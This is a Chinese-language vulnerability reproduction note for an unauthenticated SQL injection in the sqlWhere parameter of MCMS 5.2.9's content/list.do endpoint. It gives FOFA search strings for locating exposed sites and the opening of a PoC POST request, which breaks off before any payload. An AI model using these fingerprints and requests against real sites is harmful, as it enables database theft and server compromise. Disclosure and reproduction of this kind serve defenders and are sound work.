0x01 产品简介

铭飞CMS是一款基于java开发的一套轻量级开源内容管理系统,铭飞CMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。

0x02 漏洞概述

由于铭飞CMS 文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证，未经身份验证的攻击者可利用该漏洞获取数据库敏感数据，进一步利用可获取服务器权限。

0x03 影响范围

铭飞CMS = 5.2.9

0x04 复现环境

FOFA：

body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"

0x05 漏洞复现 

PoC

POST /cms/content/list.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-